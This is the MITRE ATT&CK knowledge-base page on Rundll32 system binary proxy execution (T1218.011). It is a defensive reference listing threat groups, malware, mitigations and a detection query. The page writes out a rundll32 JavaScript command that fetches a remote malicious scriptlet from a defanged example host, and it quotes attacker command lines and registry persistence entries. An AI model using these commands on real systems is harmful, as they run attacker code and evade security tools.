System Binary Proxy Execution: Rundll32, Sub-technique T1218.011 - Enterprise | MITRE ATT&CK®

System Binary Proxy Execution: Rundll32, Sub-technique T1218.011 - Enterprise | MITRE ATT&CK®
Currently viewing
ATT&CK v17.1
which was live between April 22, 2025 and October 27, 2025.
Learn more about the versioning system
or
see the live site
Techniques
Enterprise
System Binary Proxy Execution
Rundll32
System Binary Proxy Execution:
Rundll32
Other sub-techniques of System Binary Proxy Execution (14)
ID
Name
T1218.001
Compiled HTML File
T1218.002
Control Panel
T1218.003
CMSTP
T1218.004
InstallUtil
T1218.005
Mshta
T1218.007
Msiexec
T1218.008
Odbcconf
T1218.009
Regsvcs/Regasm
T1218.010
Regsvr32
T1218.011
Rundll32
T1218.012
Verclsid
T1218.013
Mavinject
T1218.014
MMC
T1218.015
Electron Applications
Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e.
Shared Modules
), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex:
rundll32.exe {DLLname, DLLfunction}
).
Rundll32.exe can also be used to execute
Control Panel
Item files (.cpl) through the undocumented shell32.dll functions
Control_RunDLL
and
Control_RunDLLAsUser
. Double-clicking a .cpl file also causes rundll32.exe to execute.
[1]
For example,
ClickOnce
can be proxied through Rundll32.exe.
Rundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this:
rundll32.exe javascript:"..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")"
This behavior has been seen used by malware such as Poweliks.
[2]
Adversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command
rundll32.exe ExampleDLL.dll, ExampleFunction
, rundll32.exe would first attempt to execute
ExampleFunctionW
, or failing that
ExampleFunctionA
, before loading
ExampleFunction
). Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending
and/or
to harmless ones.
[3]
[4]
DLL functions can also be exported and executed by an ordinal number (ex:
rundll32.exe file.dll,#1
).
Additionally, adversaries may use
Masquerading
techniques (such as changing DLL file names, file extensions, or function names) to further conceal execution of a malicious payload.
[5]
ID:
T1218.011
Sub-technique of:
T1218
Tactic:
Defense Evasion
Platforms:
Windows
Contributors:
Casey Smith; Gareth Phillips, Seek Ltd.; James_inthe_box, Me; Ricardo Dias
Version:
2.4
Created:
23 January 2020
Last Modified:
15 April 2025
Version Permalink
Live Version
Procedure Examples
ID
Name
Description
C0028
2015 Ukraine Electric Power Attack
During the
2015 Ukraine Electric Power Attack
Sandworm Team
used a backdoor which could execute a supplied DLL using
rundll32.exe
[6]
S0045
ADVSTORESHELL
ADVSTORESHELL
has used rundll32.exe in a Registry value to establish persistence.
[7]
G0073
APT19
APT19
configured its payload to inject into the rundll32.exe.
[8]
G0007
APT28
APT28
executed
CHOPSTICK
by using rundll32 commands such as
rundll32.exe "C:\Windows\twain_64.dll"
APT28
also executed a .dll for a first stage dropper using rundll32.exe. An
APT28
loader Trojan saved a batch script that uses rundll32 to execute a DLL payload.
[9]
[7]
[10]
[11]
[12]
[13]
G0022
APT3
APT3
has a tool that can run DLLs.
[14]
G0050
APT32
APT32
malware has used rundll32.exe to execute an initial infection process.
[15]
G0082
APT38
APT38
has used rundll32.exe to execute binaries, scripts, and Control Panel Item files and to execute code via proxy to avoid triggering security tools.
[16]
[17]
G0096
APT41
APT41
has used rundll32.exe to execute a loader.
[18]
G0143
Aquatic Panda
Aquatic Panda
used rundll32.exe to proxy execution of a malicious DLL file identified as a keylogging binary.
[19]
S0438
Attor
Attor
's installer plugin can schedule rundll32.exe to load the dispatcher.
[20]
S0093
Backdoor.Oldrea
Backdoor.Oldrea
can use rundll32 for execution on compromised hosts.
[21]
S0606
Bad Rabbit
Bad Rabbit
has used rundll32 to launch a malicious DLL as
C:Windowsinfpub.dat
[22]
S0268
Bisonal
Bisonal
has used rundll32.exe to execute as part of the Registry Run key it adds:
HKEY_CURRENT_USER \Software\Microsoft\Windows\CurrentVersion\Run\"vert" = "rundll32.exe c:\windows\temp\pvcu.dll , Qszdez"
[23]
S0520
BLINDINGCAN
BLINDINGCAN
has used Rundll32 to load a malicious DLL.
[24]
G0108
Blue Mockingbird
Blue Mockingbird
has executed custom-compiled XMRIG miner DLLs using rundll32.exe.
[25]
S0635
BoomBox
BoomBox
can use RunDLL32 for execution.
[26]
S0204
Briba
Briba
uses rundll32 within
Registry Run Keys / Startup Folder
entries to execute malicious DLLs.
[27]
S1039
Bumblebee
Bumblebee
has used
rundll32
for execution of the loader component.
[28]
[29]
C0015
C0015
During
C0015
, the threat actors loaded DLLs via
rundll32
using the
svchost
process.
[30]
C0018
C0018
During
C0018
, the threat actors used
rundll32
to run
Mimikatz
[31]
C0021
C0021
During
C0021
, the threat actors used
rundll32.exe
to execute the
Cobalt Strike
Beacon loader DLL.
[32]
G0008
Carbanak
Carbanak
installs VNC server software that executes through rundll32.
[33]
S0154
Cobalt Strike
Cobalt Strike
can use
rundll32.exe
to load DLL from the command line.
[34]
[30]
[35]
S0244
Comnie
Comnie
uses Rundll32 to load a malicious DLL.
[36]
G0052
CopyKittens
CopyKittens
uses rundll32 to load various tools on victims, including a lateral movement tool named Vminst, Cobalt Strike, and shellcode.
[37]
S0137
CORESHELL
CORESHELL
is installed via execution of rundll32 with an export named "init" or "InitW."
[38]
S0046
CozyCar
The
CozyCar
dropper copies the system file rundll32.exe to the install location for the malware, then uses the copy of rundll32.exe to load and execute the main
CozyCar
component.
[39]
G1034
Daggerfly
Daggerfly
proxied execution of malicious DLLs through a renamed rundll32.exe binary.
[40]
S0255
DDKONG
DDKONG
uses Rundll32 to ensure only a single instance of itself is running at once.
[41]
S1052
DEADEYE
DEADEYE
can use
rundll32.exe
for execution of living off the land binaries (lolbin) such as
SHELL32.DLL
[42]
S0554
Egregor
Egregor
has used rundll32 during execution.
[43]
S0081
Elise
After copying itself to a DLL file, a variant of
Elise
calls the DLL file using rundll32.exe.
[44]
S0082
Emissary
Variants of
Emissary
have used rundll32.exe in Registry values added to establish persistence.
[45]
S0634
EnvyScout
EnvyScout
has the ability to proxy execution of malicious files with Rundll32.
[26]
S0568
EVILNUM
EVILNUM
can execute commands and scripts through rundll32.
[46]
S0512
FatDuke
FatDuke
can execute via rundll32.
[47]
S0267
FELIXROOT
FELIXROOT
uses Rundll32 for executing the dropper program.
[48]
[49]
G0046
FIN7
FIN7
has used
rundll32.exe
to execute malware on a compromised network.
[50]
S0143
Flame
Rundll32.exe is used as a way of executing
Flame
at the command-line.
[51]
S0381
FlawedAmmyy
FlawedAmmyy
has used
rundll32
for execution.
[52]
S1044
FunnyDream
FunnyDream
can use
rundll32
for execution of its components.
[53]
G0047
Gamaredon Group
Gamaredon Group
malware has used rundll32 to launch additional malicious components.
[54]
S0032
gh0st RAT
gh0st RAT
variant has used rundll32 for execution.
[55]
S0342
GreyEnergy
GreyEnergy
uses PsExec locally in order to execute rundll32.exe at the highest privileges (NTAUTHORITY\SYSTEM).
[49]
G0125
HAFNIUM
HAFNIUM
has used
rundll32
to load malicious DLLs.
[56]
S0698
HermeticWizard
HermeticWizard
has the ability to create a new process using
rundll32
[57]
S1027
Heyoka Backdoor
Heyoka Backdoor
can use rundll32.exe to gain execution.
[58]
S0483
IcedID
IcedID
has used rundll32.exe to execute the
IcedID
loader.
[59]
[60]
S0260
InvisiMole
InvisiMole
has used rundll32.exe for execution.
[61]
S0044
JHUHUGIT
JHUHUGIT
is executed using rundll32.exe.
[62]
[63]
S1190
Kapeka
Kapeka
is a Windows DLL file executed via ordinal by
rundll32.exe
[64]
[65]
G0094
Kimsuky
Kimsuky
has used
rundll32.exe
to execute malicious scripts and malware on a victim's network.
[66]
S0250
Koadic
Koadic
can use Rundll32 to execute additional payloads.
[67]
S0356
KONNI
KONNI
has used Rundll32 to execute its loader for privilege escalation purposes.
[68]
[69]
S0236
Kwampirs
Kwampirs
uses rundll32.exe in a Registry value added to establish persistence.
[70]
S1160
Latrodectus
Latrodectus
can use rundll32.exe to execute downloaded DLLs.
[71]
[72]
G0032
Lazarus Group
Lazarus Group
has used rundll32 to execute malicious payloads on a compromised host.
[73]
G0140
LazyScripter
LazyScripter
has used
rundll32.exe
to execute
Koadic
stagers.
[74]
G0059
Magic Hound
Magic Hound
has used rundll32.exe to execute MiniDump from comsvcs.dll when dumping LSASS memory.
[75]
S0167
Matryoshka
Matryoshka
uses rundll32.exe in a Registry Run key value for execution as part of its persistence mechanism.
[76]
S0576
MegaCortex
MegaCortex
has used
rundll32.exe
to load a DLL for file encryption.
[77]
S1122
Mispadu
Mispadu
uses RunDLL32 for execution via its injector DLL.
[78]
S1026
Mongall
Mongall
can use
rundll32.exe
for execution.
[58]
S0256
Mosquito
Mosquito
's launcher uses rundll32.exe in a Registry Key value to start the main backdoor capability.
[79]
G0069
MuddyWater
MuddyWater
has used malware that leveraged rundll32.exe in a Registry Run key to execute a .dll.
[80]
S0637
NativeZone
NativeZone
has used rundll32 to execute a malicious DLL.
[81]
S1100
Ninja
Ninja
loader components can be executed through rundll32.exe.
[82]
S0353
NOKKI
NOKKI
has used rundll32 for execution.
[83]
S0368
NotPetya
NotPetya
uses
rundll32.exe
to install itself on remote systems when accessed via
PsExec
or
wmic
[84]
C0022
Operation Dream Job
During
Operation Dream Job
Lazarus Group
executed malware with
C:\\windows\system32\rundll32.exe "C:\ProgramData\ThumbNail\thumbnail.db"
CtrlPanel S-6-81-3811-75432205-060098-6872 0 0 905
[85]
[86]
[87]
C0005
Operation Spalax
During
Operation Spalax
, the threat actors used
rundll32.exe
to execute malicious installers.
[88]
S1050
PcShare
PcShare
has used
rundll32.exe
for execution.
[53]
S0518
PolyglotDuke
PolyglotDuke
can be executed using rundll32.exe.
[47]
S0139
PowerDuke
PowerDuke
uses rundll32.exe to load.
[89]
S0113
Prikormka
Prikormka
uses rundll32.exe to load its DLL.
[90]
S0147
Pteranodon
Pteranodon
executes functions using rundll32.exe.
[91]
S0196
PUNCHBUGGY
PUNCHBUGGY
can load a DLL using Rundll32.
[92]
S0650
QakBot
QakBot
has used Rundll32.exe to drop malicious DLLs including
Brute Ratel C4
and to enable C2 communication.
[93]
[94]
[95]
[96]
[35]
S0481
Ragnar Locker
Ragnar Locker
has used rundll32.exe to execute components of VirtualBox.
[97]
S1130
Raspberry Robin
Raspberry Robin
uses rundll32 execution without any command line parameters to contact command and control infrastructure, such as IP addresses associated with
Tor
nodes.
[98]
G1039
RedCurl
RedCurl
has used rundll32.exe to execute malicious files.
[99]
[100]
[101]
S0148
RTM
RTM
runs its core DLL file using rundll32.exe.
[102]
[103]
S0074
Sakula
Sakula
calls cmd.exe to run various DLL files via rundll32.
[104]
G0034
Sandworm Team
Sandworm Team
used a backdoor which could execute a supplied DLL using rundll32.exe.
[105]
S0461
SDBbot
SDBbot
has used rundll32.exe to execute DLLs.
[52]
S0382
ServHelper
ServHelper
contains a module for downloading and executing DLLs that leverages
rundll32.exe
[106]
S0589
Sibot
Sibot
has executed downloaded DLLs with
rundll32.exe
[107]
C0024
SolarWinds Compromise
During the
SolarWinds Compromise
APT29
used
Rundll32.exe
to execute payloads.
[108]
[109]
S1030
Squirrelwaffle
Squirrelwaffle
has been executed using
rundll32.exe
[110]
[111]
S0142
StreamEx
StreamEx
uses rundll32 to call an exported function.
[112]
S1183
StrelaStealer
StrelaStealer
DLL payloads have been executed via
rundll32.exe
[113]
[114]
S0559
SUNBURST
SUNBURST
used Rundll32 to execute payloads.
[109]
S1064
SVCReady
SVCReady
has used
rundll32.exe
for execution.
[115]
G0092
TA505
TA505
has leveraged
rundll32.exe
to execute malicious DLLs.
[116]
[106]
G0127
TA551
TA551
has used rundll32.exe to load malicious DLLs.
[117]
S1196
Troll Stealer
Troll Stealer
is dropped as a DLL file and executed via
rundll32.exe
by its installer.
[118]
[119]
S0452
USBferry
USBferry
can execute rundll32.exe in memory to avoid detection.
[120]
C0037
Water Curupira Pikabot Distribution
Water Curupira Pikabot Distribution
utilizes rundll32.exe to execute the final
Pikabot
payload, using the named exports
Crash
or
Limit
depending on the variant.
[121]
S0141
Winnti for Windows
The
Winnti for Windows
installer loads a DLL using rundll32.
[122]
[123]
G0102
Wizard Spider
Wizard Spider
has utilized
rundll32.exe
to deploy ransomware commands with the use of WebDAV.
[124]
S0412
ZxShell
ZxShell
has used rundll32.exe to execute other DLLs and named pipes.
[125]
Mitigations
ID
Mitigation
Description
M1050
Exploit Protection
Microsoft's Enhanced Mitigation Experience Toolkit (EMET) Attack Surface Reduction (ASR) feature can be used to block methods of using rundll32.exe to bypass application control.
Detection
ID
Data Source
Data Component
Detects
DS0017
Command
Command Execution
Command arguments used with the rundll32.exe invocation may also be useful in determining the origin and purpose of the DLL being loaded. Typical command-line usage of rundll32.exe is
"rundll32.exe DllFile,EntryPoint"
where
DllFile
is the name of the DLL file being called and EntryPoint the name of the entry point in the DLL file.
DLLs stored on SMB shares can similarly be called using the syntax of
"rundll32.exe \
\DllFile,EntryPoint"
where
is the IPv4 address of the host of the SMB share.
Rundll32 can also be used to execute arbitrary Javascript using the syntax
"rundll32.exe javascript:<
code_block
>"
where <
code_block
> is a string defining the Javascript code to be executed.
DS0022
File
File Metadata
Analyze contextual data about executed DLL files, which may include information such as name, the content (ex: signature, headers, or data/media), age, user/owner, permissions, etc.
DS0011
Module
Module Load
Analyzing DLL exports and comparing to runtime arguments may be useful in uncovering obfuscated function calls. Static Portable Executable (PE) analysis tools can be used to examine and dump the exports of a particular DLL.
DS0009
Process
Process Creation
Use process monitoring to monitor the execution and arguments of rundll32.exe. Compare recent invocations of rundll32.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity.
When monitoring for all instances of Rundll32 execution, as defined by the logic in the Detection Pseudocode, it is imperative to also investigate the full set of command-line parameters used. These parameters contain key information about the DLL payload, including the name, entry point, and optional arguments.
Note: Event IDs are for Sysmon (Event ID 10 - process create) and Windows Security Log (Event ID 4688 - a new process has been created). The Analytic looks for any instances of rundll32.exe but does no other filtering, which may result in false positives. Therefore, we recommend tuning any such analytics by including additional logic (e.g., testing the name of the user that created the process) that helps reduce false positives.
Analytic 1 - RunDLL32.exe Monitoring
(source="
WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="1") OR (source="
WinEventLog:Security" EventCode="4688") Image= "rundll32.exe"
References
Merces, F. (2014). CPL Malware Malicious Control Panel Items. Retrieved November 1, 2017.
B. Ancel. (2014, August 20). Poweliks – Command Line Confusion. Retrieved March 5, 2018.
Attackify. (n.d.). Rundll32.exe Obscurity. Retrieved August 23, 2021.
gtworek. (2019, December 17). NoRunDll. Retrieved August 23, 2021.
Ariel silver. (2022, February 1). Defense Evasion Techniques. Retrieved April 8, 2022.
Booz Allen Hamilton. (2016). When The Lights Went Out. Retrieved December 18, 2024.
Bitdefender. (2015, December). APT28 Under the Scope. Retrieved February 23, 2017.
Ahl, I. (2017, June 06). Privileges and Credentials: Phished at the Request of Counsel. Retrieved May 17, 2018.
Alperovitch, D.. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016.
Lee, B., Falcone, R. (2018, June 06). Sofacy Group’s Parallel Attacks. Retrieved June 18, 2018.
Unit 42. (2017, December 15). Unit 42 Playbook Viewer. Retrieved December 20, 2017.
ESET Research. (2019, May 22). A journey to Zebrocy land. Retrieved June 20, 2019.
NSA, CISA, FBI, NCSC. (2021, July). Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments. Retrieved July 26, 2021.
Chen, X., Scott, M., Caselden, D.. (2014, April 26). New Zero-Day Exploit targeting Internet Explorer Versions 9 through 11 Identified in Targeted Attacks. Retrieved January 14, 2016.
Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.
DHS/CISA. (2020, August 26). FASTCash 2.0: North Korea's BeagleBoyz Robbing Banks. Retrieved September 29, 2021.
SEONGSU PARK. (2022, December 27). BlueNoroff introduces new methods bypassing MoTW. Retrieved February 6, 2024.
Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.
CrowdStrike. (2023). 2022 Falcon OverWatch Threat Hunting Report. Retrieved May 20, 2024.
Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020.
Slowik, J. (2021, October). THE BAFFLING BERSERK BEAR: A DECADE’S ACTIVITY TARGETING CRITICAL INFRASTRUCTURE. Retrieved December 6, 2021.
Mamedov, O. Sinitsyn, F. Ivanov, A.. (2017, October 24). Bad Rabbit ransomware. Retrieved January 28, 2021.
Hayashi, K., Ray, V. (2018, July 31). Bisonal Malware Used in Attacks Against Russia and South Korea. Retrieved August 7, 2018.
US-CERT. (2020, August 19). MAR-10295134-1.v1 – North Korean Remote Access Trojan: BLINDINGCAN. Retrieved August 19, 2020.
Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved May 26, 2020.
MSTIC. (2021, May 28). Breaking down NOBELIUM’s latest early-stage toolset. Retrieved August 4, 2021.
Ladley, F. (2012, May 15). Backdoor.Briba. Retrieved February 21, 2018.
Merriman, K. and Trouerbach, P. (2022, April 28). This isn't Optimus Prime's Bumblebee but it's Still Transforming. Retrieved August 22, 2022.
Kamble, V. (2022, June 28). Bumblebee: New Loader Rapidly Assuming Central Position in Cyber-crime Ecosystem. Retrieved August 24, 2022.
DFIR Report. (2021, November 29). CONTInuing the Bazar Ransomware Story. Retrieved September 29, 2022.
Costa, F. (2022, May 1). RaaS AvosLocker Incident Response Analysis. Retrieved January 11, 2023.
Dunwoody, M., et al. (2018, November 19). Not So Cozy: An Uncomfortable Examination of a Suspected APT29 Phishing Campaign. Retrieved November 27, 2018.
Kaspersky Lab's Global Research and Analysis Team. (2015, February). CARBANAK APT THE GREAT BANK ROBBERY. Retrieved August 23, 2018.
Strategic Cyber LLC. (2020, November 5). Cobalt Strike: Advanced Threat Tactics for Penetration Testers. Retrieved April 13, 2021.
Kenefick, I. et al. (2022, October 12). Black Basta Ransomware Gang Infiltrates Networks via QAKBOT, Brute Ratel, and Cobalt Strike. Retrieved February 6, 2023.
Grunzweig, J. (2018, January 31). Comnie Continues to Target Organizations in East Asia. Retrieved June 7, 2018.
ClearSky Cyber Security and Trend Micro. (2017, July). Operation Wilted Tulip: Exposing a cyber espionage apparatus. Retrieved August 21, 2017.
Anthe, C. et al. (2015, October 19). Microsoft Security Intelligence Report Volume 19. Retrieved December 23, 2015.
F-Secure Labs. (2015, April 22). CozyDuke: Malware Analysis. Retrieved December 10, 2015.
Threat Hunter Team. (2023, April 20). Daggerfly: APT Actor Targets Telecoms Company in Africa. Retrieved July 25, 2024.
Ash, B., et al. (2018, June 26). RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families. Retrieved July 2, 2018.
Rufus Brown, Van Ta, Douglas Bienstock, Geoff Ackerman, John Wolfram. (2022, March 8). Does This Look Infected? A Summary of APT41 Targeting U.S. State Governments. Retrieved July 8, 2022.
Rochberger, L. (2020, November 26). Cybereason vs. Egregor Ransomware. Retrieved December 30, 2020.
Falcone, R., et al.. (2015, June 16). Operation Lotus Blossom. Retrieved February 15, 2016.
Falcone, R. and Miller-Osborn, J. (2016, February 3). Emissary Trojan Changelog: Did Operation Lotus Blossom Cause It to Evolve?. Retrieved February 15, 2016.
Adamitis, D. (2020, May 6). Phantom in the Command Shell. Retrieved November 17, 2024.
Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020.
Patil, S. (2018, June 26). Microsoft Office Vulnerabilities Used to Distribute FELIXROOT Backdoor in Recent Campaign. Retrieved November 17, 2024.
Cherepanov, A. (2018, October). GREYENERGY A successor to BlackEnergy. Retrieved November 15, 2018.
Abdo, B., et al. (2022, April 4). FIN7 Power Hour: Adversary Archaeology and the Evolution of FIN7. Retrieved April 5, 2022.
sKyWIper Analysis Team. (2012, May 31). sKyWIper (a.k.a. Flame a.k.a. Flamer): A complex malware for targeted attacks. Retrieved September 6, 2018.
Financial Security Institute. (2020, February 28). Profiling of TA505 Threat Group That Continues to Attack the Financial Sector. Retrieved July 14, 2022.
Vrabie, V. (2020, November). Dissecting a Chinese APT Targeting South Eastern Asian Government Institutions. Retrieved September 19, 2022.
Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020.
Sabo, S. (2018, February 15). Musical Chairs Playing Tetris. Retrieved February 19, 2018.
Gruzweig, J. et al. (2021, March 2). Operation Exchange Marauder: Active Exploitation of Multiple Zero-Day Microsoft Exchange Vulnerabilities. Retrieved March 3, 2021.
ESET. (2022, March 1). IsaacWiper and HermeticWizard: New wiper and worm targetingUkraine. Retrieved April 10, 2022.
Chen, Joey. (2022, June 9). Aoqin Dragon | Newly-Discovered Chinese-linked APT Has Been Quietly Spying On Organizations For 10 Years. Retrieved July 14, 2022.
Kenefick , I. (2022, December 23). IcedID Botnet Distributors Abuse Google PPC to Distribute Malware. Retrieved July 24, 2024.
DFIR. (2022, April 25). Quantum Ransomware. Retrieved July 26, 2024.
Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020.
F-Secure. (2015, September 8). Sofacy Recycles Carberp and Metasploit Code. Retrieved August 3, 2016.
Mercer, W., et al. (2017, October 22). "Cyber Conflict" Decoy Document Used in Real Cyber Conflict. Retrieved November 2, 2018.
Microsoft. (2024, February 14). Backdoor:Win64/KnuckleTouch.A!dha. Retrieved January 6, 2025.
Mohammad Kazem Hassan Nejad, WithSecure. (2024, April 17). KAPEKA A novel backdoor spotted in Eastern Europe. Retrieved January 6, 2025.
An, J and Malhotra, A. (2021, November 10). North Korean attackers use malicious blogs to deliver malware to high-profile South Korean targets. Retrieved December 29, 2021.
Magius, J., et al. (2017, July 19). Koadic. Retrieved September 27, 2024.
Karmi, D. (2020, January 4). A Look Into Konni 2019 Campaign. Retrieved April 28, 2020.
Threat Intelligence Team. (2021, August 23). New variant of Konni malware used in campaign targetting Russia. Retrieved January 5, 2022.
Symantec Security Response Attack Investigation Team. (2018, April 23). New Orangeworm attack group targets the healthcare sector in the U.S., Europe, and Asia. Retrieved May 8, 2018.
Stepanic, D. and Bousseaden, S. (2024, May 15). Spring Cleaning with LATRODECTUS: A Potential Replacement for ICEDID. Retrieved September 13, 2024.
Abrams, L. (2024, April 30). New Latrodectus malware attacks use Microsoft, Cloudflare themes. Retrieved September 13, 2024.
Cherepanov, Anton. (2019, November 10). ESETresearch discovered a trojanized IDA Pro installer. Retrieved September 12, 2024.
Jazi, H. (2021, February). LazyScripter: From Empire to double RAT. Retrieved November 17, 2024.
DFIR Report. (2022, March 21). APT35 Automates Initial Access Using ProxyShell. Retrieved May 25, 2022.
Minerva Labs LTD and ClearSky Cyber Security. (2015, November 23). CopyKittens Attack Group. Retrieved November 17, 2024.
Del Fierro, C. Kessem, L.. (2020, January 8). From Mega to Giga: Cross-Version Comparison of Top MegaCortex Modifications. Retrieved February 15, 2021.
ESET Security. (2019, November 19). Mispadu: Advertisement for a discounted Unhappy Meal. Retrieved March 13, 2024.
ESET, et al. (2018, January). Diplomats in Eastern Europe bitten by a Turla mosquito. Retrieved July 3, 2018.
Kaspersky Lab's Global Research & Analysis Team. (2018, October 10). MuddyWater expands operations. Retrieved November 2, 2018.
Guerrero-Saade, J. (2021, June 1). NobleBaron | New Poisoned Installers Could Be Used In Supply Chain Attacks. Retrieved August 4, 2021.
Dedola, G. et al. (2023, October 12). ToddyCat: Keep calm and check logs. Retrieved January 3, 2024.
Grunzweig, J., Lee, B. (2018, September 27). New KONNI Malware attacking Eurasia and Southeast Asia. Retrieved November 5, 2018.
Chiu, A. (2016, June 27). New Ransomware Variant "Nyetya" Compromises Systems Worldwide. Retrieved March 26, 2019.
ClearSky Research Team. (2020, August 13). Operation 'Dream Job' Widespread North Korean Espionage Campaign. Retrieved December 20, 2021.
Breitenbacher, D and Osis, K. (2020, June 17). OPERATION IN(TER)CEPTION: Targeted Attacks Against European Aerospace and Military Companies. Retrieved December 20, 2021.
Cashman, M. (2020, July 29). Operation North Star Campaign. Retrieved December 20, 2021.
M. Porolli. (2021, January 21). Operation Spalax: Targeted malware attacks in Colombia. Retrieved September 16, 2022.
Adair, S.. (2016, November 9). PowerDuke: Widespread Post-Election Spear Phishing Campaigns Targeting Think Tanks and NGOs. Retrieved January 11, 2017.
Cherepanov, A.. (2016, May 17). Operation Groundbait: Analysis of a surveillance toolkit. Retrieved May 18, 2016.
Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.
Elovitz, S. & Ahl, I. (2016, August 18). Know Your Enemy: New Financially-Motivated & Spear-Phishing Group. Retrieved February 26, 2018.
CS. (2020, October 7). Duck Hunting with Falcon Complete: A Fowl Banking Trojan Evolves, Part 2. Retrieved September 27, 2021.
Rainey, K. (n.d.). Qbot. Retrieved September 27, 2021.
Cyberint. (2021, May 25). Qakbot Banking Trojan. Retrieved September 27, 2021.
Morrow, D. (2021, April 15). The rise of QakBot. Retrieved September 27, 2021.
SophosLabs. (2020, May 21). Ragnar Locker ransomware deploys virtual machine to dodge security. Retrieved June 29, 2020.
Lauren Podber and Stef Rand. (2022, May 5). Raspberry Robin gets the worm early. Retrieved May 17, 2024.
Group-IB. (2020, August). RedCurl: The Pentest You Didn’t Know About. Retrieved August 9, 2024.
Group-IB. (2021, November). RedCurl: The Awakening. Retrieved August 14, 2024.
Tancio et al. (2024, March 6). Unveiling Earth Kapre aka RedCurl’s Cyberespionage Tactics With Trend Micro MDR, Threat Intelligence. Retrieved August 9, 2024.
Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.
Duncan, B., Harbison, M. (2019, January 23). Russian Language Malspam Pushing Redaman Banking Malware. Retrieved June 16, 2020.
Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, July 30). Sakula Malware Family. Retrieved January 26, 2016.
Cherepanov, A.. (2017, July 4). Analysis of TeleBots’ cunning backdoor . Retrieved June 11, 2020.
Vilkomir-Preisman, S. (2019, April 2). New ServHelper Variant Employs Excel 4.0 Macro to Drop Signed Payload. Retrieved September 16, 2024..
Nafisi, R., Lelli, A. (2021, March 4). GoldMax, GoldFinder, and Sibot: Analyzing NOBELIUM’s layered persistence. Retrieved March 8, 2021.
MSRC. (2020, December 13). Customer Guidance on Recent Nation-State Cyber Attacks. Retrieved December 30, 2020.
MSTIC, CDOC, 365 Defender Research Team. (2021, January 20). Deep dive into the Solorigate second-stage activation: From SUNBURST to TEARDROP and Raindrop . Retrieved January 22, 2021.
Kumar, A., Stone-Gross, Brett. (2021, September 28). Squirrelwaffle: New Loader Delivering Cobalt Strike. Retrieved August 9, 2022.
Palazolo, G. (2021, October 7). SquirrelWaffle: New Malware Loader Delivering Cobalt Strike and QakBot. Retrieved August 9, 2022.
Cylance SPEAR Team. (2017, February 9). Shell Crew Variants Continue to Fly Under Big AV’s Radar. Retrieved February 15, 2017.
Benjamin Chang, Goutam Tripathy, Pranay Kumar Chhaparwal, Anmol Maurya & Vishwa Thothathri, Palo Alto Networks. (2024, March 22). Large-Scale StrelaStealer Campaign in Early 2024. Retrieved December 31, 2024.
Golo Mühr, Joe Fasulo & Charlotte Hammond, IBM X-Force. (2024, November 12). Strela Stealer: Today’s invoice is tomorrow’s phish. Retrieved December 31, 2024.
Schlapfer, Patrick. (2022, June 6). A New Loader Gets Ready. Retrieved December 13, 2022.
Salem, E. (2019, April 25). Threat Actor TA505 Targets Financial Enterprises Using LOLBins and a New Backdoor Malware. Retrieved May 28, 2019.
Duncan, B. (2021, January 7). TA551: Email Attack Campaign Switches from Valak to IcedID. Retrieved March 17, 2021.
Jiho Kim & Sebin Lee, S2W. (2024, February 7). Kimsuky disguised as a Korean company signed with a valid certificate to distribute Troll Stealer (English ver.). Retrieved January 17, 2025.
AhnLab ASEC. (2024, February 16). TrollAgent That Infects Systems Upon Security Program Installation Process (Kimsuky Group). Retrieved January 17, 2025.
Chen, J.. (2020, May 12). Tropic Trooper’s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020.
Shinji Robert Arasawa, Joshua Aquino, Charles Steven Derion, Juhn Emmanuel Atanque, Francisrey Joshua Castillo, John Carlo Marquez, Henry Salcedo, John Rainier Navato, Arianne Dela Cruz, Raymart Yambot & Ian Kenefick. (2024, January 9). Black Basta-Affiliated Water Curupira’s Pikabot Spam Campaign. Retrieved July 17, 2024.
Cap, P., et al. (2017, January 25). Detecting threat actors in recent German industrial attacks with Windows Defender ATP. Retrieved February 8, 2017.
Novetta Threat Research Group. (2015, April 7). Winnti Analysis. Retrieved February 8, 2017.
Shilko, J., et al. (2021, October 7). FIN12: The Prolific Ransomware Intrusion Threat Actor That Has Aggressively Pursued Healthcare Targets. Retrieved June 15, 2023.
Allievi, A., et al. (2014, October 28). Threat Spotlight: Group 72, Opening the ZxShell. Retrieved September 24, 2019.